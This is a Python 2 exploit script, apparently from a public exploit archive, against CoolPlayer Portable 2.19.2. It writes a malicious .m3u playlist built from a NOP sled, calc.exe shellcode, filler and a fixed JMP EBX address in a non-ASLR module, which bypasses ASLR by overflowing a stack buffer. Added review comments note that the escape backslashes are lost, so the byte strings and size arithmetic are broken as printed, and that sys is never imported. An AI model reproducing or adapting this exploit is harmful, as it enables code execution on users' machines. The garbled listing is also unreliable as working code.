
# Title : CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass
# Published : 2012-08-05
# Author :


# Buffer overflow that bypasses ASLR by returning into a non-ASLR module
# Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit
# Written by Blake; patched by pole
# Originally found by Securityxxxpert

# Banner. Python 2 syntax is used throughout this listing (print
# statements, raw_input below). The leading/trailing "n" in the first and
# last lines presumably were "\n" escapes whose backslash was lost when
# the page was rendered; as written they print as a literal letter.
print "n====================================="
print "CoolPlayer Portable Buffer Overflow"
print "Tested on Windows Vista (ASLR Bypass)"
print "Written by Blake"
print "Patched by pole"
print "=====================================n"

# 233 bytes for shellcode available
# 227 byte windows/exec shellcode => CMD=calc.exe
# NOTE(review): as rendered on this page the literals are plain ASCII "xNN"
# triplets rather than byte escapes, so len(shellcode) is the text length
# (several times 227) and the size bookkeeping in the comments above does
# not hold for the string as printed. The stated payload is a proof of
# execution (launches calc.exe); the listing does not show it working.
shellcode=(
"xdaxc5xbexdaxc6x9axb6xd9x74x24xf4x5dx2bxc9xb1"
"x33x83xc5x04x31x75x13x03xafxd5x78x43xb3x32xf5"
"xacx4bxc3x66x24xaexf2xb4x52xbbxa7x08x10xe9x4b"
"xe2x74x19xdfx86x50x2ex68x2cx87x01x69x80x07xcd"
"xa9x82xfbx0fxfex64xc5xc0xf3x65x02x3cxfbx34xdb"
"x4bxaexa8x68x09x73xc8xbex06xcbxb2xbbxd8xb8x08"
"xc5x08x10x06x8dxb0x1ax40x2exc1xcfx92x12x88x64"
"x60xe0x0bxadxb8x09x3ax91x17x34xf3x1cx69x70x33"
"xffx1cx8ax40x82x26x49x3bx58xa2x4cx9bx2bx14xb5"
"x1axffxc3x3ex10xb4x80x19x34x4bx44x12x40xc0x6b"
"xf5xc1x92x4fxd1x8ax41xf1x40x76x27x0ex92xdex98"
"xaaxd8xccxcdxcdx82x9ax10x5fxb9xe3x13x5fxc2x43"
"x7cx6ex49x0cxfbx6fx98x69xf3x25x81xdbx9cxe3x53"
"x5exc1x13x8ex9cxfcx97x3bx5cxfbx88x49x59x47x0f"
"xa1x13xd8xfaxc5x80xd9x2exa6x47x4axb2x07xe2xea"
"x51x58")


# Layout of the overflow string: sled, payload, filler up to the saved
# return address, then the return address itself.
nops = "x90" * 6	# intended as a six-byte NOP sled ahead of the payload
# Filler sized so that nops + shellcode + buffer reaches the saved EIP.
# With the text-form shellcode rendered on this page, 229 - len(shellcode)
# is negative and the repeat yields "". Also shadows the Python 2 builtin
# `buffer`.
buffer = "x41" * (229 - len(shellcode))

# Address inside coolplayer.exe (per the header, loaded without ASLR) that
# transfers control to EBX; a fixed address in a non-randomised module is
# what makes the ASLR bypass claimed above work. Mitigation: linking the
# binary with /DYNAMICBASE (ASLR) removes the fixed address, and the parser
# should bound the copy of playlist entries into its stack buffer.
eip = "x75x52x46x00"	# JMP EBX - coolplayer.exe "x75x52x46x00"	


# Writes the crafted playlist to the current directory. The artifact is a
# .m3u whose entire content is the oversized string assembled above, with
# no newline or path; a playlist parser that copies that entry into a
# fixed-size buffer is the vulnerability class named in the header.
print "[+] Creating malicious file"
try:
	file = open("exploit.m3u","w")	# shadows the Python 2 builtin `file`
	file.write(nops + shellcode + buffer + eip)
	file.close()	# skipped if write() raises; no with/finally here
	print "[+] File created successfully"
	raw_input("[+] Press any key to exit...")
except:
	# Bare except: any error, including EOFError/KeyboardInterrupt from
	# raw_input, is reported as a file-creation failure.
	print "[X] Error creating file!"
	# No `import sys` is visible in this listing, so if this branch runs
	# the call raises NameError rather than exiting cleanly.
	sys.exit(0)